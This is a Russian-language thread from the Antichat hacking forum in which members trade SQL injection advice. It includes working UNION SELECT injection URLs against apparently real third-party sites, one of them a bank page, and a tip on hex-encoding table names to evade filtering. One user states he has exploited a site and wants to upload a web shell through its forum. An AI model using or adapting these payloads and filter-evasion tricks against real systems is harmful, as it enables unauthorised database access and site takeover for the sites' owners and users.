Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.01.2009, 18:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
не по сабжу
Сообщение от big_BRAT
по иньекции не думаю что то то выйдет, как я понял иньекция в поле limit
инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось. |
|
|
16.01.2009, 18:58
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от geezer.code
инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось.
Только не после ордера 
ORDER BY p.post_time DESC LIMIT -3, 3
|
|
|
|
16.01.2009, 20:01
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
Значит инъекция не возможна?Щас толька ссылка была недавно уже нет!Толи автор удалил свой пост толи мне выспаться нужно!Если автор удалил можешь дать почитать?
|
|
|
|
16.01.2009, 20:18
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Qam Инъекция в лимите после ORDER BY невозможна, я думал ответ на твой вопрос дан
|
|
|
|
16.01.2009, 20:22
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 Qam
https://forum.antichat.ru/showthread.php?t=56446
|
|
|
|
16.01.2009, 20:23
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)
|
|
|
|
16.01.2009, 20:29
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от MirA
Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)
Боюсь отвечать на Ваш вопрос , во избежании причисления меня к "всеведущим гуру андеграундного мира"
По теме: дать ссылку
|
|
|
|
16.01.2009, 20:59
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.rncb.ru/print_view.php?id=450&fpath=2+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13+--+
|
|
|
|
16.01.2009, 21:00
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь
Код:
SELECT HEX('tablename')
и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D |
|
|
|
16.01.2009, 21:02
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/
Не могу понять где здесь таблицы форума???
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
